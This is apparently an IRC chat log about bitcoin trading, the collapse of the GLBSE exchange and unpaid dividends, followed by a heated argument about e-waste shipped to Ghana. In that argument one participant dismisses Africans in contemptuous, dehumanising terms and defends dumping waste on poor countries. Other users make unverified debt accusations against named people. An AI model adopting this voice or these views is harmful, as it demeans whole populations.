[-] Nov 12 20:11:05 [MPEX] [S.MPOE] 21858 @ 0.0005067 = 11.0754 BTC [-] Nov 12 20:13:04 or bitcoin fails a dies miserably Nov 12 20:14:25 neah. Nov 12 20:14:41 the entire world will crumble to dust, bitcoin will still be here. Nov 12 20:21:05 woappcoin Nov 12 20:28:47 http://www.reddit.com/r/Bitcoin/comments/132nws/short_story_contest_prize_up_to_100_btc/ Nov 12 20:28:53 ;D Nov 12 20:28:53 eee Nov 12 20:29:33 plz to redditvote! Nov 12 20:30:16 no Nov 12 20:30:19 theres a Terracoin now? Nov 12 20:30:29 you have to earn my upvote Nov 12 20:30:35 is that a chain where you constantly involve yourself in scams Nov 12 20:30:49 no wait that would be DeadTerracoin Nov 12 20:32:28 hehe, i even made a post in that forum Nov 12 20:36:03 [MPEX] [S.MPOE] 13043 @ 0.0005067 = 6.6089 BTC [-] Nov 12 20:36:05 [MPEX] [S.MPOE] 3988 @ 0.00050668 = 2.0206 BTC [-] Nov 12 20:36:35 lol evil. Nov 12 20:40:20 folks, the argument that "bitcoin is appreciating, nobody will spend" it is being refuted every day before your very eyes Nov 12 20:41:23 I anticipate receiving my incorporation papers this week Nov 12 20:42:02 if anyone else want's to get on my client list right-off-the-bat, now is the time to start the discussion Nov 12 20:42:19 wat foar? Nov 12 20:42:34 'cause after I get them, i'm launching the website and doing some advertising to fill in any gaps Nov 12 20:42:42 dub: accounting and related services Nov 12 20:43:28 smickles, books auditing too? Nov 12 20:43:47 i may even go so low as tax prep, if you entertain me. jurov i can do non-public auditing legally Nov 12 20:43:52 I'm not a CPA Nov 12 20:44:01 (yet.. but it'll be awhile) Nov 12 20:44:21 but i'll want someday nice gold plaque "audited by smicklez" Nov 12 20:44:32 once i'm a cpa in a few years, I can audit public companies Nov 12 20:44:59 jurov: I'll be sure it's gold to, part of the audit process Nov 12 20:45:02 ;) Nov 12 20:46:02 lol Nov 12 20:46:05 bitcoinold. Nov 12 20:47:11 well, yeah, CPA licensing take a minimum of 2 years in most places Nov 12 20:47:21 in 'merica Nov 12 21:01:19 [MPEX] [S.MPOE] 18889 @ 0.00050668 = 9.5707 BTC [-] Nov 12 21:01:20 [MPEX] [S.MPOE] 10411 @ 0.0005065 = 5.2732 BTC [-] Nov 12 21:17:58 https://bitcointalk.org/index.php?topic=115669.msg1331319#msg1331319 lmao this is priceless Nov 12 21:24:22 wtf is redditvote? Nov 12 21:25:06 when you vote on reddit Nov 12 21:25:11 mircea_popescu: so get the thread started :) Nov 12 21:25:27 reddit? aaaa... vomit! Nov 12 21:25:29 http://www.reddit.com/r/Bitcoin/comments/132nws/short_story_contest_prize_up_to_100_btc/ Nov 12 21:25:32 I do not like reddit Nov 12 21:25:46 lol ok then Nov 12 21:26:26 [MPEX] [S.MPOE] 26200 @ 0.0005065 = 13.2703 BTC [-] Nov 12 21:26:29 it's like a pool of vomit. Lots of regurgitate crap Nov 12 21:27:28 mircea_popescu: but this thread idea is not that bad. In those hard times we have now, people need a way to let it all out and say what they think. :) Nov 12 21:28:39 I think your alter ego, that foamy PR cunt, will get her imaginary ass handed to her on a rusty platter Nov 12 21:30:08 um Nov 12 21:30:13 what is this about ? Nov 12 21:32:18 She's awfully arrogant, insulting, etc. She's like some kind of rabid animal. That she's right on many things doesn't matter. A rabid animal ain't nice to approach. Nov 12 21:33:50 still far better than 95% of the forum idiots Nov 12 21:34:30 I'd personally prefer a condescending tone if she believes someone is acting stupid. Not that aggressive tone. Insults never get your point across. Just makes the opposite side that much stubborn. Nov 12 21:35:09 I just find it counterproductive but eh. Nov 12 21:36:39 haha rabid pr Nov 12 21:37:09 Would be a nice nick to use... Nov 12 21:37:31 "Shreds the competition. Hire the services of Rabid PR." Nov 12 21:37:40 is this about something in particular ? or what thread ? or wtf are we discussing ? Nov 12 21:39:11 ;;ticker Nov 12 21:39:11 BTCUSD ticker | Best bid: 10.98000, Best ask: 10.99999, Bid-ask spread: 0.01999, Last trade: 10.98000, 24 hour volume: 39263.00452062, 24 hour low: 10.70000, 24 hour high: 11.18000, 24 hour vwap: 10.97339 Nov 12 21:39:16 ;;bc,24hprc Nov 12 21:39:17 10.92 Nov 12 21:39:33 ooooh, we poked out above the 30 day sma for a short time Nov 12 21:49:35 smickles tonight then mono-poly? Nov 12 21:50:12 mono-poly? is smickles playing with himself? Nov 12 21:51:47 [MPEX] [S.MPOE] 14722 @ 0.0005065 = 7.4567 BTC [-] Nov 12 21:51:49 [MPEX] [S.MPOE] 22800 @ 0.00050639 = 11.5457 BTC [-] Nov 12 21:51:50 [MPEX] [S.MPOE] 7378 @ 0.0005061 = 3.734 BTC [-] Nov 12 21:54:37 "Prohibition was essentially a religious movement backed by the Methodists, Baptists, Congregationalists, Scandinavian Lutherans and other evangelical churches." Nov 12 21:57:37 if its a what do bitcointalk users think about $subject discussion, who gives a fuck Nov 12 21:57:48 oh hey, scrolling down helps Nov 12 21:58:25 that was re: mpoe-pr Nov 12 21:58:48 myeah. Nov 12 21:59:07 98% of retards agree.. Nov 12 21:59:18 thestringpuller: same time? Nov 12 22:01:12 400 utc Nov 12 22:01:33 "scandinavian lutherans", in 'merica? what, like, on vacation? ;) Nov 12 22:02:30 no, on immigration. Nov 12 22:02:42 .py time.mktime(time.gmtime()) Nov 12 22:03:06 oh, no more funbot? or was that a diff. chan.? Nov 12 22:04:15 1352779200 Nov 12 22:07:13 5~/g 16 Nov 12 22:07:16 er Nov 12 22:13:08 I am going to do something really stupid now Nov 12 22:13:45 I am going to spend about 1 h in front of the idiot-tube (aka TV) Nov 12 22:14:08 more like idiot-panel these days Nov 12 22:16:49 [MPEX] [S.MPOE] 34800 @ 0.0005061 = 17.6123 BTC [-] Nov 12 22:19:03 ya know, that btcjam should really be setup where borrowers say what the highest rate they are willing to pay is, and lenders enter bids for the rate, that way, if a listing fills, new lenders can knock out older lenders by bidding the rate down befor the listing closes Nov 12 22:20:09 or borrowers have no input on the rate, lenders bid rates, and at the end, the borrower has the choice to take it or not Nov 12 22:42:18 [MPEX] [S.MPOE] 11226 @ 0.00050877 = 5.7115 BTC [+] Nov 12 22:42:19 [MPEX] [S.MPOE] 5339 @ 0.00051155 = 2.7312 BTC [+] Nov 12 23:07:20 [MPEX] [S.MPOE] 42341 @ 0.00050702 = 21.4677 BTC [-] Nov 12 23:07:21 [MPEX] [S.MPOE] 13559 @ 0.000507 = 6.8744 BTC [-] Nov 12 23:32:22 [MPEX] [S.MPOE] 19988 @ 0.00051155 = 10.2249 BTC [+] Nov 12 23:57:29 [MPEX] [S.MPOE] 14020 @ 0.00051155 = 7.1719 BTC [+] Nov 12 23:57:30 [MPEX] [S.MPOE] 26580 @ 0.00051161 = 13.5986 BTC [+] Nov 13 00:22:35 [MPEX] [S.MPOE] 35841 @ 0.000507 = 18.1714 BTC [-] Nov 13 00:24:43 How does one get ahold of their asset issuer to avoid filing a suit? Nov 13 00:27:46 What do you mean exactly? Nov 13 00:31:00 I mean I have been trying to contact the issuer of an asset listed on GLBSE for over a month and have been ignored Nov 13 00:31:28 Atomic-Closed: what would you even sue for? Nov 13 00:31:36 I have the address of the mining operation and am ready to file suit for unpayed dividends Nov 13 00:31:54 i mean, it's not like you can prove you were owed dividends, is it? Nov 13 00:32:31 Which asset? Nov 13 00:32:36 Bitbond Nov 13 00:32:47 Ah. Nov 13 00:33:16 I also issued a mining op on GLBSE. Nov 13 00:33:23 Is the situation different for bitbond? Nov 13 00:33:41 'cause the rest of us can't prove how many (if any) shares we had Nov 13 00:34:13 I just don't see how you can pay anyone claiming to be owed anything without a proof. Claims will be much higher than what's owed. Nov 13 00:34:36 Considering that the dividends are to be payed on a set scheduled, and statements have been made to how they will be held until the GLBSE crap is over without the input of the shareholders Nov 13 00:35:15 But the issuer don't even know who is or is not a shareholder. Taking input wouldn't even be feasible. Nov 13 00:35:18 still dosent mean I cant sue Nov 13 00:35:48 Atomic-Closed: well, you can sue, but I could also sue my cat Nov 13 00:35:58 if you so want to sue, sue nefario. for undue delays Nov 13 00:35:59 If you don't have a proof/document that anything is owed... Nov 13 00:36:16 Im considering posting hte address of the mining farm on the forum to atleaszt get a response from the op Nov 13 00:36:26 thats by biggest issue is the non-communication Nov 13 00:36:39 non-communication of no new news? Nov 13 00:36:47 I have the logs of the presale and post sale conversations Nov 13 00:36:52 they will say "we're waiting for nefario". what do you do then? Nov 13 00:37:02 smickles: You're cat would win, according to you, you are its _owner_; slaves are not able to appropriate contrancts? Nov 13 00:37:12 I can talk to Bitbond's issuer... had no problem with that. Nov 13 00:37:16 smickles: err, you would be suing yourself Nov 13 00:37:55 in all seriousness, all glbse assets should be considered lost untill nefario releases the data in provable way Nov 13 00:38:14 He probably didn't answer on account of you demanding to be paid? Nov 13 00:38:28 yeah, demanding to be paid at this point is unreasonable Nov 13 00:38:29 So should that mean that all anonymity is null and void too? Nov 13 00:38:57 Atomic-Closed: what are you expecting here? the issue can't do anything because nefario fucked them Nov 13 00:39:03 It means that with anonymity, with the exchange closing, who is owed what got lost. Nov 13 00:39:31 The issuer knows that i own shares Nov 13 00:39:34 and because nefario fucked the issuer, he fucked you too by proxy Nov 13 00:39:51 Atomic-Closed: but without proof it would be wrong to pay you and not the others Nov 13 00:39:54 I was told my that investment was safe by the issuer Nov 13 00:39:59 Imagine you're bitbond. There's people claiming to be owed X and you can't verify. You pay them. Then info is released and you realise many who claimed weren't owed anything at all to start with... Nov 13 00:40:09 I know I own X shares of s2cm, but i can't pay even myself dividends Nov 13 00:40:13 hmm... but were the shares on GLBSE? Nov 13 00:40:25 they were sold pre-ipo Nov 13 00:40:35 hmm - that is a bit different Nov 13 00:40:42 Atomic-Closed: did you ever have the ability to sell them? Nov 13 00:40:42 but doesn't mean you still hold them Nov 13 00:41:00 aye, but were they transfered on GLBSE or held outside of GLBSE? Nov 13 00:41:08 if you ever had the ability to sell them, and don't have proof that you didn't sell them, then you are in the same position Nov 13 00:41:31 it's really tough to prove a negative statement Nov 13 00:41:36 I am in that boat with YABMC - would love to shut it down but can't at this point Nov 13 00:41:52 need Nef to step up and do what he said Nov 13 00:42:39 Im thinking that I just need to post the information then. ITs the lack of response here that is killing me Nov 13 00:43:16 I know how many shares I had, I likely know how many shares Azelphur has, and I likely know the minimum # of shares imsaguy has. but I can't pay dividends to any of us b/c we have no proof Nov 13 00:43:21 Atomic-Closed: you own bitbond ? Nov 13 00:43:32 I own shares of it Nov 13 00:43:32 that is amazingrando, right ? Nov 13 00:43:32 indeed :/ Nov 13 00:43:43 yes it is Nov 13 00:43:55 Atomic-Closed: I think you're likely just creating usless drama Nov 13 00:43:57 what are you wanting him to do exactly ? Nov 13 00:44:16 He stated he had a plan if nef didnt do as promised Nov 13 00:44:19 i want it exicuted Nov 13 00:44:23 ahh Nov 13 00:44:25 oh? Nov 13 00:44:27 didn't read that Nov 13 00:44:33 damn, that was stupid of him Nov 13 00:44:39 what was the plan? Nov 13 00:44:43 that I dont know Nov 13 00:45:11 well, that op was in seatle, right? Nov 13 00:45:19 Tacomma Nov 13 00:45:25 oh yeah Nov 13 00:45:31 shared facility with Gigavps Nov 13 00:45:32 and shakaru set it up Nov 13 00:45:40 yes Nov 13 00:45:45 lol Nov 13 00:45:50 Atomic-Closed now this is interesting Nov 13 00:46:02 ;;getrating shakaru-otc Nov 13 00:46:02 WARNING: Currently not authenticated. User shakaru-otc, rated since Tue Dec 20 18:32:21 2011. Cumulative rating -3, from 6 total ratings. Received ratings: 3 positive, 3 negative. Sent ratings: 2 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=shakaru-otc Nov 13 00:46:34 "owes community over 20000 usd" Nov 13 00:47:23 bitbond was owned/operated by amazingrando. Nov 13 00:47:34 I was not aware shakaru had anything to do with their Washington facility Nov 13 00:47:56 mircea_popescu: yeah, but he let shakaru set up the farm after he welched on a massive debt Nov 13 00:48:01 [MPEX] [S.MPOE] 9822 @ 0.0005061 = 4.9709 BTC [-] Nov 13 00:48:03 [MPEX] [S.MPOE] 10678 @ 0.000506 = 5.4031 BTC [-] Nov 13 00:48:16 I heard that his payement went to the repayment fund Nov 13 00:48:29 i had no idea shakaru had anything to do with it either. Nov 13 00:48:52 And is all fairness, I am being a bit harsh, but if nef runs, are we all just SOL? Nov 13 00:48:56 JWU_42: shakaru told me himself, and sent me pics of it while he was still saying he'd pay me ~600 btc that he owed (still owed) me Nov 13 00:49:02 *still owes Nov 13 00:49:11 hmm Nov 13 00:49:15 i wouldn't take his word for anything. Nov 13 00:49:16 Atomic-Closed: yes Nov 13 00:49:31 ;;getrating amazingrando Nov 13 00:49:31 WARNING: Currently not authenticated. User amazingrando, rated since Sun Jan 8 01:29:35 2012. Cumulative rating 46, from 15 total ratings. Received ratings: 15 positive, 0 negative. Sent ratings: 11 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=amazingrando Nov 13 00:50:29 dude nobody is left ffs. Nov 13 00:50:46 i am the fucking dean of age of btc finance. this is sad, i've barely been here a year. Nov 13 00:51:04 :DD Nov 13 00:51:18 pump and dump Nov 13 00:51:20 ;) Nov 13 00:52:24 this situation needs to seriously improve. Nov 13 00:53:04 I agree Nov 13 00:53:33 anyway. so you had the investment pre-ipo and were allocated glbse shares after ipo ? Nov 13 00:55:17 It was pre the second ipo. Or when the shares were aded Nov 13 00:55:21 added* Nov 13 00:55:30 at this point its hard to even know with no access to glbse Nov 13 00:55:42 yeah. well... Nov 13 00:55:53 i can see the guy's position. how can he know you didn't sell the shares on glbse Nov 13 00:56:10 I guess your right Nov 13 00:57:10 not much he can do. picked the wrong exchange, everyone's fucked. Nov 13 01:02:55 How do you know the writing contest won't be a political campaign Nov 13 01:03:07 well thank you all for your input Nov 13 01:03:17 thestringpuller huh ? Nov 13 01:03:30 people campaigning to be the best story Nov 13 01:04:07 why would i care ? Nov 13 01:05:25 lol Nov 13 01:05:38 competition eh? Nov 13 01:05:44 sure! Nov 13 01:05:51 XD Nov 13 01:05:57 you got the writing bug mod6 ? Nov 13 01:06:57 I read the post for sure - I think its a really interesting/worthwhile idea to get some well-thought out discussion on the matter. Nov 13 01:08:13 I thought about writing something -- but I better just stick to getting BitOTTer finished Nov 13 01:08:16 :) Nov 13 01:08:45 maybe i'll get a chance to write something though, we'll see. I just got this new lappy working - its /way/ faster for running the android emulator Nov 13 01:09:05 4 cores instead of 2 = zooooooom Nov 13 01:10:17 hehe prolly right. Nov 13 01:10:35 should give the people who didn't learn math in school a chance too Nov 13 01:10:56 ahh! a two-fer! :D Nov 13 01:12:18 you've had a bunch of good posts in english on trilema, so thx for that Nov 13 01:12:25 mircea_popescu: is a bully Nov 13 01:12:35 haha ty. Nov 13 01:13:00 i bet you believe all children should have bullies :P Nov 13 01:13:22 [MPEX] [S.MPOE] 46922 @ 0.000506 = 23.7425 BTC [-] Nov 13 01:13:24 [MPEX] [S.MPOE] 8478 @ 0.00050582 = 4.2883 BTC [-] Nov 13 01:14:44 ;;ticker Nov 13 01:14:44 BTCUSD ticker | Best bid: 11.08980, Best ask: 11.09000, Bid-ask spread: 0.00020, Last trade: 11.08980, 24 hour volume: 38835.80047192, 24 hour low: 10.76666, 24 hour high: 11.18000, 24 hour vwap: 10.99078 Nov 13 01:15:22 wow, it hit 11.18 Nov 13 01:16:12 mhm Nov 13 01:18:10 !ticker S.MPOE Nov 13 01:18:12 [MPEX:S.MPOE] 1day: 0.0005025 / 0.0005072 / 0.00051161 (1691707 shares, 858.04 BTC), 30day: 0.0004035 / 0.00045616 / 0.00051161 (67514063 shares, 30,797.82 BTC) Nov 13 01:18:40 mircea, is there any difference in exercising MKOPT and SPLIT-issued option for the issuer? Nov 13 01:18:59 nope. Nov 13 01:19:19 so both are allocated as appropriate part of total exercises? Nov 13 01:19:24 both create the same, indistinguishable instrument. Nov 13 01:19:48 how's coinbr going jurov? Nov 13 01:29:55 welcome. seems you were on the wrong side of the split :P Nov 13 01:30:21 haha ty! welcome to you all back into my world! Nov 13 01:31:50 http://www.pieterhugo.com/ Nov 13 01:33:52 bah im so sick fo these fuckwits. Nov 13 01:33:59 IT IS VERY GOOD THAT MARGINAL COMMUNITIES GET FUCKED. Nov 13 01:34:04 this is the motherfucking point of life. Nov 13 01:39:15 [MPEX] [S.MPOE] 12373 @ 0.00050582 = 6.2585 BTC [-] Nov 13 01:44:17 the point of life is for the civilised world to ensure that the uncivilised never catch up? Nov 13 01:44:47 doesn't quite fit the 'free market' ideology Nov 13 01:45:07 "civilised" is a vague/loaded word Nov 13 01:45:35 its easy to infer my meaning though Nov 13 01:45:38 yes Nov 13 01:46:00 the countries that understand the need to recycle/manage waste Nov 13 01:46:23 there is no response to his statement Nov 13 01:46:31 it's not dick's job to ensure jane "catches up" Nov 13 01:46:39 fuck jane. Nov 13 01:46:42 not in caps this time Nov 13 01:46:58 he is ensuring that she cannot? Nov 13 01:47:24 hwo so ? Nov 13 01:49:35 by poisoning her and rendering her environment unproductive at best, probably uninhabitable by dick's standards Nov 13 01:49:40 yaya. Nov 13 01:49:58 it does not scale Nov 13 01:50:01 the assumption underlying your evaluation is that dick = jane Nov 13 01:50:09 what happens when jane dies and dick has to look after his own shit Nov 13 01:50:11 this is false. dick is a pretty cool guy. jane is a worthless pos. Nov 13 01:50:20 dick is giving her a crumb in exchange for her scratching his back. Nov 13 01:50:33 no, dick is giving her a poison chalice Nov 13 01:50:36 if he doesn't want the risk of breaking a nail she can do w/o the crumb. Nov 13 01:50:48 i've missed something here Nov 13 01:51:01 "it doesn't scale" Nov 13 01:51:05 d'uh, of course it doesn't. Nov 13 01:51:07 it should not. Nov 13 01:51:21 not everyone belongs in a palace. most people belong in the huts, so as to have palaces. for just a few. Nov 13 01:51:35 what's this fun with dick and jane? /me scrolls log Nov 13 01:51:47 i r fighting the beast of collectivism. Nov 13 01:52:30 mircea_popescu: what happens when there are no more habitable huts Nov 13 01:52:46 What are they burning plastic for? Nov 13 01:52:49 dick flies away in his magic rocket to another place and starts over? Nov 13 01:52:54 smickles for being imbeciles, basically. Nov 13 01:52:54 smickles: recycling Nov 13 01:52:57 dub pretty much. Nov 13 01:53:10 mircea_popescu: that is not a realistic end game Nov 13 01:53:13 yes, it is. Nov 13 01:53:18 that's not how you recycle plastic, afaik Nov 13 01:53:27 if you imagine that the entire population of africa croaking tomorrow would make any difference you're dreaming. Nov 13 01:53:36 smickles depends if you're from ghana. Nov 13 01:53:53 smickles: thats what happens to most of your countries recylcling Nov 13 01:54:02 if all of africal died, i'd say that's a pretty big market opportunity Nov 13 01:54:03 its not just ghana Nov 13 01:54:20 smickles "nice country, unfortunately inhabited" Nov 13 01:55:05 who makes money by shipping all my plastic to ghana? Nov 13 01:55:10 the problem really is these days, the rich/successful/smart don't flaunt it nearly enough Nov 13 01:55:14 that sounds like a great racket to be in Nov 13 01:55:19 the poor/stupid/failed get the idea that they're doing pretty ok Nov 13 01:55:20 some contractor to your govt Nov 13 01:55:29 and it's just "bad luck". or even they;'re owed something. Nov 13 01:55:55 smickles it's not even the case, most plastic gets buried. Nov 13 01:55:58 on the spot. Nov 13 01:56:06 unless dick has already started on his escape plan (protip: he hasn't because he's spending all his money making war) then your end game fails Nov 13 01:56:58 seems better to bury it than burn it to me Nov 13 01:57:21 they're burning it to extract metal Nov 13 01:57:22 dub what escape, seriously ? Nov 13 01:57:29 mircea_popescu: the rocket of course Nov 13 01:57:53 get out. when "there's" no more inhabitable huts some will be buldozed, asphalted over and re-hutted Nov 13 01:57:57 smickles: they've been sold the opportunity to extract metal and sell it Nov 13 01:58:09 and some will be just repopulated with ex-hut dwellers beaten into submission to new hut environment. Nov 13 01:58:14 only the catch is they have to die and kill thier land in the process Nov 13 01:58:31 and i suppose it's your fault they're being stupid dub ? Nov 13 01:58:55 yes in part Nov 13 01:59:05 I recycle my rubbish because it saves me money Nov 13 01:59:26 I know that its not really being recycled, not in a scalable manner Nov 13 01:59:45 i recycle because, guess what, i use recyclabe materials. Nov 13 01:59:46 its killing children in ghana Nov 13 01:59:56 i buy glass bottles. my total plastic consumption is something like a few kgs a year. Nov 13 02:00:09 no you recycle because you have been incentivized via your wallet Nov 13 02:00:14 not at all. Nov 13 02:00:21 romania is a world apart. recycling was always high here Nov 13 02:00:28 and to this day there's no fines/incentives to do it. Nov 13 02:00:33 (I presume there is differentiated charging for recycling and common waste disposal in romania) Nov 13 02:00:36 nope. Nov 13 02:00:49 ever since the commie times they had an efficient recycling system in place. Nov 13 02:00:54 we get penalites here now if we dont. Nov 13 02:00:55 how quaint Nov 13 02:01:00 kakobrekla: carrot/stick same deal Nov 13 02:01:01 this is like, the 60s. way before the west found out about recycling. Nov 13 02:01:07 its stupud as its useless Nov 13 02:01:40 mircea_popescu: do you actually know where the recycling goes? Nov 13 02:01:41 and in any event garbage costs are dismal, i pay 2.8 euros per month Nov 13 02:02:01 dub glass to the glass factory. metal to the metal sorting/refurbishing centers. paper to teh paper factory. etc. Nov 13 02:02:03 irrelevant Nov 13 02:02:05 plastic to ghana. Nov 13 02:02:24 (literally to ghana) Nov 13 02:02:28 "plastic makes it possible" Nov 13 02:02:29 the market provides you an incentive to spend time sorting trash Nov 13 02:02:35 nope ?! Nov 13 02:02:41 what incentive lol. Nov 13 02:02:54 2.8 EU a month Nov 13 02:02:59 this is like saying the market provides me an incentive to chat with you. doth not, considering what i make it'd be hard pressed to. Nov 13 02:03:16 2.8 eur a month regardless tho. Nov 13 02:03:29 actually Nov 13 02:03:36 ;;calc 11.8 / 4.4 Nov 13 02:03:37 2.68181818182 Nov 13 02:03:39 2.7 Nov 13 02:04:10 anyway, the market then takes your trash and money and the money the state gives it to quietly dispose of its shit, and shops it to the 3rd world Nov 13 02:04:18 so dub who is this contractor you mentioned, and what part of the gov't actually gives them teh monies? Nov 13 02:04:34 dub no srlsy, it's mostly recycled locally. Nov 13 02:04:46 [MPEX] [S.MPOE] 5144 @ 0.00050628 = 2.6043 BTC [+] Nov 13 02:04:47 [MPEX] [S.MPOE] 8156 @ 0.0005083 = 4.1457 BTC [+] Nov 13 02:04:55 smickles: some company, and the same part of govt that collects tax Nov 13 02:05:00 well no, but you get the idea Nov 13 02:05:20 and i seriously see no problem even if all the garbage was dumped on some failed country. Nov 13 02:05:22 lol, you have no details? where did you even get this info? Nov 13 02:05:30 mircea_popescu: well thats not normal from my understanding Nov 13 02:05:31 this is what you get for sucking '; you store everyone's garbage. fuck you. Nov 13 02:05:53 smickles: its entirely dependant on idunno what vfuckign country you are in? Nov 13 02:06:02 he's in the us lol Nov 13 02:06:09 i dump all my garbage when i fly over romania Nov 13 02:06:30 ;;google persnickety american shot down over romania Nov 13 02:06:31 Persnickety Snark: 2009-02-08: ; Daring Fireball Linked List: July 2012: ; The big soda ban and Michael Bloomberg' s struggle against vulgarity: Nov 13 02:06:31 dub: so all of this is speculation? Nov 13 02:06:39 smickles: 'that guy didnt spoonfeed me the answers' is not a defence Nov 13 02:06:59 i'm not forming a defence here, am I? Nov 13 02:07:05 you must be!!! Nov 13 02:07:13 for there are dumbass africans who burn their plastics!!! Nov 13 02:07:20 FORM A DEFENCE! GIVE A SHIT! Nov 13 02:07:30 anyway, generally, when you make an assertion, you should be able to justify it Nov 13 02:07:46 the africans would not burn the waste if we did not give it to them for that purpose Nov 13 02:07:51 o, right. Nov 13 02:07:59 let's give them some wells for the purpose of jumping in ? Nov 13 02:07:59 smickles: not really Nov 13 02:08:18 its teh case here, that means its likely the case in most of the world Nov 13 02:08:24 only if we can have round the clock news of the rescue attempts Nov 13 02:08:29 the africans would not burn the waste if we did not give it to them for that purpose <<< define tenuous Nov 13 02:08:51 next im going to hear an argument that slavery reparations should be enacted, to repay the young africans disposed of by the older africans. Nov 13 02:08:57 it was all the dutchmen's fault!!11 Nov 13 02:09:01 smickles: they wouldnt have the waste to burn if our corporations did not provide massive amounts of it to them Nov 13 02:09:01 its teh case here, that means its likely the case in most of the world <<< hasty generalization Nov 13 02:09:21 dude Nov 13 02:09:27 dub that's ridiculous. i have caustic stuff in my house, i don't pour it in my eyes Nov 13 02:09:27 generalisations are all there is Nov 13 02:09:30 dude, ever taken a logic class? Nov 13 02:09:32 EVEN THO EVIL CORPS GAVE IT TO ME Nov 13 02:09:49 mircea_popescu: they've been sold recycling Nov 13 02:10:08 its all profit driven out of western markets Nov 13 02:10:12 right! Nov 13 02:10:16 why the fuck else would it happen? Nov 13 02:10:17 they want it, they have to work for it. Nov 13 02:10:28 they don;'t want the work, they don't get the money. Nov 13 02:10:32 why is this so hard to grasp ? Nov 13 02:10:41 well they dont really want it Nov 13 02:10:48 so then let them stop. Nov 13 02:10:54 didn't the wester world go thru hundreds of years of shit to get where they are now? Nov 13 02:11:06 this is sounding like the rape trial. "well... i didn't REALLY want it" Nov 13 02:11:15 smickles yes. Nov 13 02:11:25 take shell in nigeria Nov 13 02:11:34 in fact, as recent as 100 years ago london was so covered in coal dust they had coal storms Nov 13 02:11:37 apparently... they survived. Nov 13 02:11:42 do the villages that get poisoned want to die? Nov 13 02:11:59 dub did shell get govt permits ? Nov 13 02:12:04 yes Nov 13 02:12:06 then yes they do. Nov 13 02:12:11 if they don't, elect better politicians. Nov 13 02:12:12 goodluck jonathan opened his arms Nov 13 02:12:27 sure, just need bigger guns Nov 13 02:12:32 so get bigger guns. Nov 13 02:12:55 which brings us round circle : this is the fucking point of life. either get the bigger gun or get good at sucking cock. Nov 13 02:13:07 doesnt scale Nov 13 02:13:14 so you say. Nov 13 02:13:22 far as i can see it scales just fine. Nov 13 02:13:26 the tide of shit will flow Nov 13 02:13:30 yaya bs. Nov 13 02:13:42 what doesn't scale is your expectation that every kid gets xmas Nov 13 02:13:50 I don't expect that Nov 13 02:13:53 some kids die in the snow in front of my house. not all kids get xmas. Nov 13 02:14:13 ya know, if you want to change the minds of smart people, you'll need to avoid logical fallacies Nov 13 02:14:29 otherwise, they tend to have fun with you Nov 13 02:14:41 all this free market ideology is complete bullshit when the actions of a few prevent the many from even participating Nov 13 02:14:42 smickles i think he just wants to unwind from the brainless zombie regurgitated crap he's bombarded with non stop in the "civilised" world. Nov 13 02:14:49 dub not at all. Nov 13 02:14:54 smickles: smart people know these things Nov 13 02:15:04 I'm not trying to educate Nov 13 02:15:13 no. idiots who invest in pirate and masquerade as "smart" "know" these "things" Nov 13 02:15:19 where things really means idiotic nonsense. Nov 13 02:15:49 strawman Nov 13 02:16:01 :D yay Nov 13 02:16:08 would you have preferred i said "buy nefario flowers" ? Nov 13 02:16:16 cause that also scales lol. Nov 13 02:17:08 smickles: which logical fallacies btw Nov 13 02:17:34 so, it looks ly my city's plastic is either recycled locally, or burried locally Nov 13 02:18:03 did you grasp that its not 'plastic' they are burning? Nov 13 02:18:31 its e-waste contaning metals they are extracting for resale Nov 13 02:18:39 well, i haven't found details about how most tucson corpo's recycle their compies yet Nov 13 02:19:44 also if you are going to compartmentalise this into 'the waste I personally generate' well, lol @ the convince smart people stuff Nov 13 02:19:51 all this free market ideology is complete bullshit when the actions of a few prevent the many from even participating << srsly, it's the stupidity of the many that prevents them from participating. Nov 13 02:21:06 well again, when you have corrupt authoritarian states forcing their people to do this.. Nov 13 02:21:24 ug, compartmentalize? you said it was some contractor from my gov't, i'm looking for that Nov 13 02:21:43 dub wait a second. ever heard of tammany hall ? Nov 13 02:21:55 corruption is something of the people by the people, it's not fallen from the sky. Nov 13 02:21:57 sure there is stupidity but its not like jane's son *click*bele mbwamba born with cancer from the lead in the water supply can do shit Nov 13 02:22:08 dub fuck him, he was born to a stupid mother. Nov 13 02:23:03 https://bitcointalk.org/index.php?topic=120119.msg1331215#msg1331215 whoa looky! that acct exists since may! and it made 6 posts which are 3. Nov 13 02:23:07 whose sock ? Nov 13 02:23:10 well im not sure but I think the free market idea is that he can improve his lot Nov 13 02:23:47 dub improve his lot yes Nov 13 02:23:50 his lot = my lot no. Nov 13 02:23:51 ya know, it does involve a bit of luck, Nov 13 02:24:08 and your problem is that you spurn his improving his shitty lot to shitty+1 Nov 13 02:24:14 and you want him to improve to cool+12 Nov 13 02:24:29 imporvement over being a computer burner prolly doesn't look like much to us, but may look like a lot to them Nov 13 02:24:29 it ain't how it works. takes generations of peopleworking dilligently. Nov 13 02:24:35 takes a couple of obamas to fuck it all to hell Nov 13 02:24:42 it's how it works, going down is easier than going up. Nov 13 02:27:20 my view is purely selfish Nov 13 02:27:26 you need to manage the proles Nov 13 02:27:48 it costs more not to, in the long run Nov 13 02:29:18 dub: what are you suggesting we do Nov 13 02:29:28 heh so as usual the socialist are actually the racists. Nov 13 02:29:34 dude, they have the right to manage themselves, let them. Nov 13 02:29:37 well, I mean, mircea_popescu is probably in a better position to do something than I am Nov 13 02:29:39 be honest, put your rubbish in your local landfil and wear the environmental fallout yourself Nov 13 02:29:55 um Nov 13 02:30:02 isn't that what I do? Nov 13 02:30:05 dub that'd just destroy land values, i'd move to their country via gentrification and force them to move to mine Nov 13 02:30:05 instead of exporting your problem for profit Nov 13 02:30:12 isn't it easier to move the garbage than the people ? Nov 13 02:30:14 [MPEX] [S.MPOE] 9821 @ 0.00050582 = 4.9677 BTC [-] Nov 13 02:30:16 [MPEX] [S.MPOE] 9664 @ 0.00050575 = 4.8876 BTC [-] Nov 13 02:30:45 I'm still not finding thes people who ship US compies to African countries to be melted down Nov 13 02:31:18 its not like they advertise this widely Nov 13 02:31:21 smickles the reason you aren't is because there's no such thing. on the african side it's pretty much independent business. Nov 13 02:31:44 as in, those unfortunate fucks are both more respectable and more human than the average us office drone Nov 13 02:31:50 they live an independent life, out in the waste. Nov 13 02:32:06 dub: there'd at least be indications of it from the gov't, b/c i doubt poor african countries pay enough to make it profitable on their own Nov 13 02:32:33 a line item in a budget somewhere, associated with a statute Nov 13 02:32:36 where would there be indications? Nov 13 